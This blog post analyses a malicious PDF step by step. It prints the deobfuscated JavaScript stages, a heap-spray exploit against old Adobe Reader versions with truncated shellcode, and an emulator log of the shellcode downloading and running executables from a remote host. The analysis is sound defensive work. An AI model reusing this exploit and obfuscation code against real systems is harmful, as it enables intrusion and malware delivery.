Wednesday, January 8, 2014

Analysis of suspicious PDF


Hello. Happy New Year and Merry Christmas! After a long break I decided to write a new article, this time about analyzing a suspicious PDF file. Several months ago I had an interesting quest analyzing such a file, and now I have some free time to tell how it went.
Almost all of the tools mentioned in this article can be found in the REMnux image. You can download it and install it as a virtual appliance on VMware or VirtualBox.
First of all, I analysed the file with the pdfid tool:
PDF Header: %PDF-1.3
obj 11
endobj 11
stream 4
endstream 4
xref 1
trailer 1
startxref 1
/Page 1
/Encrypt 0
/ObjStm 0
/JS 1
/JavaScript 1
/AA 0
/OpenAction 1
/AcroForm 0
/JBIG2Decode 0
/RichMedia 0
/Launch 0
/EmbeddedFile 0
/XFA 0
/Colors > 2^24 0

The discovered OpenAction and JavaScript entries immediately draw attention. Good.
Next I used pdf-parser to parse the file.
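The triage step above can be sketched in a few lines of JavaScript. This is only an illustration: the WATCHED list and the flagKeywords helper are assumptions of the sketch, not part of pdfid, and the report is a shortened copy of the output shown above.

```javascript
// Keywords that usually deserve a closer look when their count is non-zero.
// The list is an assumption for this sketch, not pdfid's own scoring.
const WATCHED = ["/JS", "/JavaScript", "/AA", "/OpenAction", "/AcroForm",
                 "/JBIG2Decode", "/RichMedia", "/Launch", "/EmbeddedFile", "/XFA"];

// Parse pdfid-style "keyword count" lines and keep the watched, non-zero ones.
function flagKeywords(report) {
  const hits = {};
  for (const line of report.split("\n")) {
    const m = line.trim().match(/^(\/\S+)\s+(\d+)/);
    if (m && WATCHED.includes(m[1]) && Number(m[2]) > 0) {
      hits[m[1]] = Number(m[2]);
    }
  }
  return hits;
}

// Shortened copy of the pdfid output above.
const report = [
  "/Page 1", "/Encrypt 0", "/JS 1", "/JavaScript 1",
  "/AA 0", "/OpenAction 1", "/Launch 0", "/Colors > 2^24 0",
].join("\n");

console.log(flagKeywords(report));
```

For this file only /JS, /JavaScript and /OpenAction are reported, which is exactly the combination that suggests a script running as soon as the document is opened.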

obj 1 0
Type: /Catalog
Referencing: 2 0 R, 4 0 R

<<
/Type /Catalog
/PageLayout /SinglePage
/Pages 2 0 R
/OpenAction 4 0 R
>>

We can see that OpenAction calls the JavaScript in object 4, which links to FlateDecode object 5:
obj 4 0
Type: /Action
Referencing: 5 0 R
<<
/Type /Action
/S /JavaScript
/JS 5 0 R
>>
obj 5 0
Type:
Referencing:
Contains stream

<<
/Length 394
/Filter /FlateDecode
>>
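The /Filter /FlateDecode entry means that the stream body is zlib-compressed. A minimal sketch of what decoding such a stream amounts to, assuming a Node-style JavaScript environment; the flateDecode helper and the sample bytes are made up for illustration and are not taken from the analysed file:

```javascript
const zlib = require("zlib");

// FlateDecode streams are zlib-wrapped deflate data, so inflateSync recovers them.
function flateDecode(streamBytes) {
  return zlib.inflateSync(streamBytes).toString("latin1");
}

// Stand-in for the raw bytes between "stream" and "endstream" of an object.
const fakeStream = zlib.deflateSync(Buffer.from("app.alert('hello');", "latin1"));

console.log(flateDecode(fakeStream));
```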

Decode the JavaScript code with pdf-parser:


Transform it into a convenient form:
var sum = '';
var duct = 300;
var os = "";
var pr = null;
var num = 1;
var func = 'd';
app.doc.syncAnnotScan();
if (app.plugIns.length < 1) {
func += "4";
num = 0;
}
if (!(app.plugIns.length < 0)) {
var xnm = { nPage: 0 };
pr = app.doc.getAnnots(xnm);
sum = pr[num].subject;
}
if (app.plugIns.length > 2) {
var buf = sum.split(/-/);
var ap = this;
var acc = ap["une" + "sca" + "pe"];
var src = String["fromC" + "harC" + "ode"];
for (var n = 0; n < buf.length - 1; n++) os += acc(src(37) + buf[n + 1]);
func = "";
if (app.plugIns.length > 0) {
if (!(app.plugIns.length > 0)) {
func += "abd";
num = 123;
}
num = 0;
ap['ev' + func + src(77 + 20) + "l"](os);
num = 0;
}
}
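To make the tricks in this script easier to see, here is a small sketch of what the string concatenations and the decoding loop evaluate to. The decodeSubject helper and the sample subject string are made up for illustration; the real subject is stored in the PDF annotation.

```javascript
// The split strings simply rebuild well-known names at run time.
// func is reset to "" before the call, and 77 + 20 = 97 is the code of "a".
const unescapeName = "une" + "sca" + "pe";
const evalName = "ev" + "" + String.fromCharCode(77 + 20) + "l";

// Same loop as in the script: the first chunk is skipped, and every other
// chunk is treated as a hex byte by prefixing "%" (char code 37).
function decodeSubject(subject) {
  const buf = subject.split(/-/);
  let os = "";
  for (let n = 0; n < buf.length - 1; n++) {
    os += unescape(String.fromCharCode(37) + buf[n + 1]);
  }
  return os;
}

// Made-up subject string in the same "-"-separated hex format.
console.log(unescapeName, evalName, decodeSubject("x-61-6c-65-72-74"));
// prints: unescape eval alert
```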

Not bad. Let's also analyze the PDF file with jsunpack:


At first sight, jsunpack immediately flagged the getAnnots function, which is associated with vulnerability CVE-2009-1492 (annotation handling in PDF files in Adobe Reader and Acrobat). But if you compare our results above with the corresponding exploit, this vulnerability has no relation to the present case. Here the annotation is used only as storage for a large part of the script, for obfuscation.

The annotation data returned by getAnnots is stored in the encoded stream object 9. Copy the JS code from our result and add the data from the stream. The obvious first step would be to replace eval with alert and open the file in your browser. But let's try to run it with the SpiderMonkey js shell instead. The main variables are already defined in the pre.js file, which you can also find in the REMnux distro.
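The idea of defining the Acrobat objects a script expects before running it can be sketched for a Node-style JavaScript shell. This is not the content of pre.js: makeSandbox, runStage, the three fake plug-ins and the sample annotation subjects are all assumptions of the sketch. The first-stage script shown earlier is run with its eval swapped for a function that only records what would have been executed.

```javascript
// Hypothetical stand-ins for the Acrobat objects the first-stage script touches.
function makeSandbox(subjects) {
  const captured = [];
  const app = {
    plugIns: [{}, {}, {}], // length > 2, so the decoding branch runs
    doc: {
      syncAnnotScan() {},
      getAnnots() { return subjects.map((s) => ({ subject: s })); },
    },
  };
  // The script looks up unescape and eval on "this", so both live on one object.
  const host = {
    unescape: unescape,
    eval(code) { captured.push(code); }, // record instead of executing
  };
  return { app, host, captured };
}

function runStage(source, subjects) {
  const { app, host, captured } = makeSandbox(subjects);
  new Function("app", source).call(host, app);
  return captured;
}

// First-stage script, copied from the listing earlier in the article.
const stage1 = `var sum = ''; var duct = 300; var os = ""; var pr = null;
var num = 1; var func = 'd'; app.doc.syncAnnotScan();
if (app.plugIns.length < 1) { func += "4"; num = 0; }
if (!(app.plugIns.length < 0)) { var xnm = { nPage: 0 };
pr = app.doc.getAnnots(xnm); sum = pr[num].subject; }
if (app.plugIns.length > 2) { var buf = sum.split(/-/); var ap = this;
var acc = ap [ "une" + "sca" + "pe" ]; var src = String ["fromC"+"harC"+"ode" ];
for (var n = 0; n < buf.length-1; n++) os += acc( src(37) + buf[n+1] );
func = ""; if (app.plugIns.length > 0) {
if (!(app.plugIns.length > 0)) { func += "abd"; num = 123; }
num = 0; ap ['ev' + func + src(77+20) + "l" ](os); num = 0; } }`;

// Made-up annotation subjects; the script reads the second one (num = 1).
console.log(runStage(stage1, ["unused", "x-61-6c-65-72-74-28-31-29"]));
```

With these made-up subjects the recorded next stage is the string alert(1); with the real annotation data it would be the second-stage script.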

Not bad. After decoding we obtain a new script, which again uses the eval function and takes its data from stream 7:

function LnX6eI__qBoDrb5(Xj__TJe_0_j, Sut0_yx_4){
var O_6__t8 = 20;
var LK__SC__k = 0;
var Yf2_7661XQk3t = 512;
var M__D2__r_5_I7_D = O_6__t8;
var k12_hf_0p2_30aB = "";
var m57_Ww_VVKg = 4;
var P_A7_cf7J = this ;
var uvD2__e0__4W = "1234ee";
var Ja4_hF_A41Ch510 = arguments;
try {
var YNS0B64n__I_E = 0;
if (app){
M__D2__r_5_I7_D = M__D2__r_5_I7_D + 2;
Sut0_yx_4 = pr[YNS0B64n__I_E].subject;
}
uvD2__e0__4W = uvD2__e0__4W.replace(/\d+/, "call");
}
catch (e){
}
….

LnX6eI__qBoDrb5(0, "b02h8a6b5h47a7a0353ha0agbe863926927d6i399fc16014550ebd6516171b6e243d5c5gcd4073a1795jaf7f5348a8aa58953eab208d36cfb6c765479dcab32g4e221f3727140i4hc9667ha1bh8ca1ba9g6003cc439f082042074e10150g7j3h8e.....
….
");

After refactoring:

function func_01(arg_0, arg_1) {
var v0 = 20;
var v1 = 0;
var v2 = 512;
var v3 = v0;
var v4 = "";
var v5 = 4;
var v6 = this;
var v7 = "1234ee";
var v8 = arguments;
try {
var v9 = 0;
if (app) {
v3 = v3 + 2;
arg_1 = pr[v9].subject;
}
v7 = v7.replace(/\d+/, "call");
} catch (e) {}
v3 = v3 - v0;
var v10 = new Array();
var v11 = 150;
if (v11 > 0) {
v10[0] = v11;
v10[1] = v2;
v10[0] = v10[0] - v11;
v10[2] = v10[0];
v10[1] = v10[1] - v2;
v10[3] = v10[1];
}
if (arg_0) {
v10 = arg_0;
}
if (!arg_0) {
var v12 = v8[v7].toString(); //arguments.callee.toString();
var v13 = 0;
var v14 = v13;
v11 = v11 - 102; //150 – 102 = 48
var v15 = 0;
while (v14 < v12.length) { //while(0<arguments.callee.toString().length);
v15 = v12.charCodeAt(v14); // arguments.callee.toString().charCodeAt(0);
if (v15 >= v11 && v15 <= 57) {
if (v13 == v5) {
v13 = -1;
}
if (v13 < 0) {
v13 = 0;
}
v10[v13] += v15;
if (v10[v13] > v2) {
v10[v13] -= v2;
}
v13 = v13 + 1;
}
v14 = v14 + 1;
}
}
var v16 = 0;
var v17 = 0;
var v18 = -1;
var v19 = 0;
var v20 = 0;
do {
var v21 = 256;
if (v10[v19] > v21) {
v10[v19] -= v21;
}
v19 = v19 + 1;
} while (v19 < v5);
v19 = v19 - v5;
while (v19 < arg_1.length) {
var v22 = arg_1.substr(v19, 1) + ' V V ';
v19 = v19 + 1;
var v23 = parseInt(v22, v0);
if (v18 != -1) {
v17 += v23;
if (v16 == v5) {
v16 = 0;
}
var v24 = v17;
v24 = v24 - (v20 + 2) * v10[v16];
if (v24 <= 0) {
v24 = v24 - Math.floor(v24 / 256) * 256;
}
v24 = String.fromCharCode(v24);
if (v3 == 1) {
v4 += v23;
} else if (v3 == 2) {
v4 += v24;
} else {
v4 += v19;
v18 = -2;
}
v18 = -1;
v16 = v16 + 1;
v20 = v20 + 1;
} else if (v18 == -1) {
v18 = v0;
v17 = v23 * v0;
}
}
var v25 = this;
v25['eval'](v4);
}
func_01(0, "b02h8a......
….
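The second half of the refactored function (the loop over arg_1) can be read as follows: every two characters of the payload form one base-20 number (digits 0-9 and a-j), from which a multiple of one of the four key values in v10 is subtracted before the result is reduced modulo 256. A minimal sketch of that arithmetic, covering only the v3 == 2 branch that is taken when app exists; decodePayload mirrors the loop, while encodePayload and the key values are made up so that the example can round-trip.

```javascript
// Mirrors the decoding loop: pair -> number, subtract (n + 2) * key, wrap to a byte.
function decodePayload(encoded, key) {
  let out = "";
  for (let i = 0; i + 1 < encoded.length; i += 2) {
    const n = i / 2; // index of the output character (v20)
    const pair = parseInt(encoded.slice(i, i + 2), 20); // hi * 20 + lo
    let v = pair - (n + 2) * key[n % key.length];
    if (v <= 0) {
      v = v - Math.floor(v / 256) * 256;
    }
    out += String.fromCharCode(v);
  }
  return out;
}

// Hypothetical inverse, only here to produce test input for the sketch.
function encodePayload(text, key) {
  let out = "";
  for (let n = 0; n < text.length; n++) {
    const v = (text.charCodeAt(n) + (n + 2) * key[n % key.length]) % 256;
    out += v.toString(20).padStart(2, "0");
  }
  return out;
}

const demoKey = [100, 48, 53, 49]; // made-up key, not the one from the sample
const demoPayload = encodePayload("app.alert(1)", demoKey);
console.log(demoPayload, "->", decodePayload(demoPayload, demoKey));
```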
The most interesting thing in the code is hidden in var v12: arguments.callee (v7 becomes "callee" after the replace call, so v8[v7] is arguments.callee). arguments.callee refers to the currently executing function, and calling toString() on it returns that function's source text. So this code actually uses its own source to do the permutation. If you change anything in the code (as I did when I refactored it, or by replacing the eval call with alert), you will break the whole deobfuscation part. Good articles about this technique: http://isc.sans.org/diary/Browser+*does*+matter%2C+not+only+for+vulnerabilities+-+a+story+on+JavaScript+deobfuscation/1519 , https://isc.sans.edu/diary/Static+analysis+of+malicous+PDFs+%28Part+%232%29/7906 and http://www.nobunkum.ru/ru/flash (Russian).

In this way we can replace arguments.callee.toString().length with the length of the whole function in characters; likewise, arguments.callee.toString().charCodeAt(0) returns the code of the first character of our function's source text.
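The key derivation can be sketched on its own. The deriveKey helper below is an illustrative rewrite of the loop over v12, taking the source text as a parameter instead of reading arguments.callee; the two one-line "sources" are made up to show that changing a single digit in the code changes the key.

```javascript
// Sums the character codes of all digits in the source into four slots,
// the way the loop over v12 fills v10.
function deriveKey(source) {
  const key = [0, 0, 0, 0]; // v10 after its setup arithmetic
  let slot = 0;
  for (let i = 0; i < source.length; i++) {
    const code = source.charCodeAt(i);
    if (code >= 48 && code <= 57) { // only the digits "0".."9"
      if (slot === key.length) slot = 0;
      key[slot] += code;
      if (key[slot] > 512) key[slot] -= 512;
      slot += 1;
    }
  }
  // The do/while pass that follows subtracts 256 once from values above 256.
  return key.map((k) => (k > 256 ? k - 256 : k));
}

console.log(deriveKey("var a = 20; var b = 512;")); // [ 100, 48, 53, 49 ]
console.log(deriveKey("var a = 21; var b = 512;")); // [ 100, 49, 53, 49 ]
```

Only digits take part in the key, so renaming variables is harmless as long as the new names contain the same digits in the same order, while touching any number in the function body changes the decoded output.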
There is no need to decode everything by hand: it can be done with SpiderMonkey, or you can use jsunpack.

The final script looks like this:

var C__IC5 = new Array();
var c__fqx1kX_j7_o = 0;
var f520T_5lgB_18Rk = "";
function ki1K8ydoVI_X_f(E81L1G8LUs4H, a5_G7_Y){
var M5Klbt_L = a5_G7_Y.toString();
var UY__3N = "";
….
if (app.viewerVersion == 9.103 && xr_1d__1g_Y < 9.13){
xr_1d__1g_Y = 9.13;
}
if (!(xr_1d__1g_Y < 9 || xr_1d__1g_Y >= 9.2) || !(xr_1d__1g_Y < 8 || xr_1d__1g_Y >= 8.17)
|| !(xr_1d__1g_Y < 7 || xr_1d__1g_Y >= 7.14)){
Y8tju_86jgt_g7d(xr_1d__1g_Y);
}

After refactoring:

var gvar_0 = new Array();
var gvar_1 = 0;
var gvar_2 = "";
function func_01(arg_0, arg_1) {
var v0 = arg_1.toString();
var v1 = "";
for (var v2 = 0; v2 < v0.length; v2++) {
var v3 = parseInt(v0.substr(v2, 1));
if (!isNaN(v3)) {
v3 = v3.toString(16);
if (v3.length == 1) {
v3 = "0" + v3;
} else if (v3.length != 2) {
v3 = "00";
}
v1 = v3 + v1;
}
}
while (v1.length < 8) {
v1 = "0" + v1;
}
var v4 = arg_0.toString(16);
if (v4.length == 1) {
v4 = "0" + v4;
} else if (v4.length != 2) {
v4 = "00";
}
v1 = "3" + v4 + "P" + v1;
return v1;
}
function func_02(arg_0, arg_1) {
var v0 = new Array("");
var v1 = arg_0;
var x3l3Y5Us4__3;
if ((x3l3Y5Us4__3 = arg_0.lastIndexOf("%u00")) != -1) {
if (x3l3Y5Us4__3 + 6 == arg_0.length) {
v0[0] = arg_0.substr(x3l3Y5Us4__3 + 4, 2);
v1 = arg_0.substring(0, x3l3Y5Us4__3);
}
}
x3l3Y5Us4__3 = 1;
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < arg_1.length; fr___rItg7HCnRr++) {
var v2 = arg_1.charCodeAt(fr___rItg7HCnRr).toString(16);
if (v2.length == 1) {
v2 = "0" + v2;
}
v0[x3l3Y5Us4__3] = v2;
x3l3Y5Us4__3++;
}
fr___rItg7HCnRr = v0[0].length ? 0 : 1;
v0[x3l3Y5Us4__3] = "00";
v0[x3l3Y5Us4__3 + 1] = "00";
x3l3Y5Us4__3 += 2;
if ((v0.length - fr___rItg7HCnRr) % 2) {
v0[x3l3Y5Us4__3] = "00";
}
while (fr___rItg7HCnRr < v0.length) {
v1 += "%u" + v0[fr___rItg7HCnRr + 1] + v0[fr___rItg7HCnRr];
fr___rItg7HCnRr += 2;
}
v1 += "%u0000";
return v1;
}
function func_03(arg_0, arg_1) {
while (arg_0.length * 2 < arg_1) {
arg_0 += arg_0;
}
arg_0 = arg_0.substring(0, arg_1 / 2);
return arg_0;
}
function func_04(arg_0, arg_1, arg_2) {
var v0 = 0x0c0c0c0c;
var v1 = unescape(arg_1);
var v2 = func_01(arg_0, arg_2);
var v3 = unescape("%u9090%u9090%u9090%u21eb%ub859%u9050%u9050%u6a51.....
….
var v4 = "%u9050%u9050%u9050%u9050%u9090%u9090%u9090%u9090%u9090%u00e8%u0000%ueb00%ue900%u00fc%u0000%u645f%u30a1%u0000%u7800%u8b0c%u0c40%u708b%uad1c%.....
…..
app.b5t8_3a = unescape(func_02(v4, v2));
var v5 = 0x400000;
var v6 = v3.length * 2;
var v7 = v5 - (v6 + 0x38);
v1 = func_03(v1, v7);
var v8 = (v0 - 0x400000) / v5;
for (var v9 = 0; v9 < v8; v9++) {
gvar_0[v9] = v1 + v3;
}
}
function func_05() {
var v0 = "";
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < 12; fr___rItg7HCnRr++) {
v0 += unescape("%u0c0c%u0c0c");
}
var v1 = "";
for (fr___rItg7HCnRr = 0; fr___rItg7HCnRr < 750; fr___rItg7HCnRr++) {
v1 += v0;
}
this.collabStore = Collab.collectEmailInfo({
subj: "",
msg: v1
});
app.clearTimeOut(gvar_1);
}
function func_06(arg_0) {
var v0 = gvar_1;
if ((arg_0 >= 8 && arg_0 < 8.11) || arg_0 < 7.1) {
func_04(23, "%u0c0c%u0c0c", arg_0);
app.d_AUYb_6j8_5r = func_05;
gvar_1 = app.setTimeOut("app.d_AUYb_6j8_5r()", 1);
}
func_04(13, "%u0c0c%u0c0c", arg_0);
if (v0) {
app.clearTimeOut(v0);
}
}
var gvar_3 = 0;
var gvar_4 = app.plugIns;
for (var gvar_5 = 0; gvar_5 < gvar_4.length; gvar_5++) {
var gvar_6 = gvar_4[gvar_5].version;
if (gvar_6 > gvar_3) {
gvar_3 = gvar_6;
}
}
if (app.viewerVersion == 9.103 && gvar_3 < 9.13) {
gvar_3 = 9.13;
}
if (!(gvar_3 < 9 || gvar_3 >= 9.2) || !(gvar_3 < 8 || gvar_3 >= 8.17) || !(gvar_3 < 7 || gvar_3 >= 7.14)) {
func_06(gvar_3);
}
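The sizes used in func_04 can be worked out without allocating anything. A minimal sketch of that arithmetic; sprayLayout is a made-up helper, and the shellcode length of 256 characters is an assumption, because v3 is truncated in the listing above.

```javascript
// Reproduces the size arithmetic of func_04 for a given shellcode length.
function sprayLayout(shellcodeChars) {
  const target = 0x0c0c0c0c; // v0
  const blockSize = 0x400000; // v5, 4 MiB
  const shellcodeBytes = shellcodeChars * 2; // v6, two bytes per character
  const fillerBytes = blockSize - (shellcodeBytes + 0x38); // v7
  const limit = (target - 0x400000) / blockSize; // v8, not an integer
  const blocks = Math.ceil(limit); // iterations of "v9 < v8"
  return { fillerBytes, blocks, totalBytes: blocks * blockSize };
}

// 256 characters is a hypothetical shellcode length.
console.log(sprayLayout(256));
```

Each array element is the 0x0c0c filler followed by the shellcode, 0x38 bytes short of 4 MiB, and the loop creates 48 such blocks, roughly 192 MiB in total, which is how the spray gets close to address 0x0c0c0c0c.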

A short analysis revealed the following:
  1. jsunpack's suggestion about the Collab.collectEmailInfo function and heap spray is confirmed:
v0 += unescape("%u0c0c%u0c0c"); // hex 0x0c0c0c0c is a popular value in heap spray exploits.
this.collabStore = Collab.collectEmailInfo({
subj: "",
msg: unescape("%u0c0c%u0c0c")
});
  2. The function func_04 uses var v0 with the value 0x0c0c0c0c, which is a common ingredient of heap spraying exploits. Traditionally, heap spraying has relied on spraying with 0x0C0C0C0C followed by shellcode; the value serves both as an address in the heap and as a series of NOPs.
    Variables v3 and v4 contain what looks like shellcode: %u-encoded bytes with NOP instructions at the beginning.
To confirm my guess I ran the shellcode from v4 through libemu from PDFStreamDumper; libemu is also available in the REMnux distro:


I discovered the URL http://xxxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f01010 which is used to download and execute an exe file:

Extracted URL: http://xxxxxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f01010
0x91 push_urlmon (signature)


Unpack Log:
--------------------------------------------------
Loaded 4b8 bytes from file .\tmp.sc
Detected %u encoding input format converting...
Byte Swapping %u encoded input buffer..
Memory monitor enabled..
Initilization Complete..
Dump mode Active...
Max Steps: 2000000
Using base offset: 0x401000

401055 LoadLibraryA(urlmon)
401084 GetTempPathA(len=104, buf=12fce0) = 22
4010bc URLDownloadToFileA(http://xxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010100, C:\Users\Admin\AppData\Local\Temp\lthm.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\lthm.exe)
4010bc URLDownloadToFileA(http://xxxxc.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010101, C:\Users\Admin\AppData\Local\Temp\egWl.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\egWl.exe)
4010bc URLDownloadToFileA(http://xxxxx.info/cgi-bin/io/n002101801r0019Rf54cb7b8Xc0b46fb2Y8b008c85Z02f010102, C:\Users\Admin\AppData\Local\Temp\CqTM.exe)
4010c7 WinExec(C:\Users\Admin\AppData\Local\Temp\CqTM.exe)
4010d5 ExitProcess(1432107587)

Stepcount 300624
Primary memory: Reading 0x192 bytes from 0x401000
Scanning for changes...
Change found at 287 dumping to .\tmp.unpack
Data dumped successfully to disk

Memory Monitor Log:
*PEB (fs30) accessed at 0x40101f
peb.InInitializationOrderModuleList accessed at 0x40102a
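The "Byte Swapping %u encoded input buffer" step in the log above can be sketched like this: every %uXXXX unit is a 16-bit value whose low byte comes first in memory. The percentUToBytes helper is made up for illustration, and the input is just the first few units of v3 from the listing.

```javascript
// Convert "%uXXXX" units into the byte sequence they occupy in memory
// (little-endian: low byte first, then high byte).
function percentUToBytes(text) {
  const bytes = [];
  const re = /%u([0-9a-fA-F]{4})/g;
  let m;
  while ((m = re.exec(text)) !== null) {
    const word = parseInt(m[1], 16);
    bytes.push(word & 0xff, word >> 8);
  }
  return Uint8Array.from(bytes);
}

const firstBytes = percentUToBytes("%u9090%u21eb%ub859");
console.log(Array.from(firstBytes, (b) => b.toString(16).padStart(2, "0")).join(" "));
// prints: 90 90 eb 21 59 b8
```

The leading 90 bytes are the NOP instructions mentioned above; a byte buffer like this is what a shellcode emulator works on.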


  3. The conditions in the script:
if (!(gvar_3 < 9 || gvar_3 >= 9.2) || !(gvar_3 < 8 || gvar_3 >= 8.17) || !(gvar_3 < 7 || gvar_3 >= 7.14)) {
func_06(gvar_3);
look like what is described in http://cvedetails.com/cve/2009-2990 : Array index error in Adobe Reader and Acrobat 9.x before 9.2, 8.x before 8.1.7, and possibly 7.x through 7.1.4 might allow attackers to execute arbitrary code via unspecified vectors.
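The negated conditions are easier to read as plain version ranges. A small sketch, with made-up helper names, that checks the original expression against the range form for a few sample version numbers:

```javascript
// The condition exactly as it appears in the script.
function originalCheck(v) {
  return !(v < 9 || v >= 9.2) || !(v < 8 || v >= 8.17) || !(v < 7 || v >= 7.14);
}

// The same condition written as three half-open ranges.
function inTargetRange(v) {
  return (v >= 9 && v < 9.2) || (v >= 8 && v < 8.17) || (v >= 7 && v < 7.14);
}

for (const v of [6.0, 7.0, 7.14, 8.16, 8.17, 9.13, 9.2]) {
  console.log(v, originalCheck(v), inTargetRange(v));
}
```

Both forms agree on every sample: the exploit path is taken only for 7.x below 7.14, 8.x below 8.17 and 9.x below 9.2, which matches the version ranges in the CVE description.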

In the FlateDecode stream object 11 of our file we discovered some code in U3D:

/Subtype /U3D
/Length 27384
/Filter /FlateDecode
>>

'U3D\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00$\x00\x00\x00\x80\xb6\x02\x00\x00\x00\x00\x00j\x00\x00\x00\x15\xff\xff\xff\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\xff\xff\xff\x88\x00\x00\x00\x00\x00\x00\x00\t\x00VcgMesh01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"\xff\xff\xffb\x00\x00\x00\x00\x00\x00\x00\t\x00VcgMesh01

Well. We have a URL, shellcode and a CVE, and that's enough for this article. Next time I want to write about malware analysis with Cuckoo Sandbox, jsunpack and a web proxy like Burp Suite or OWASP ZAP.
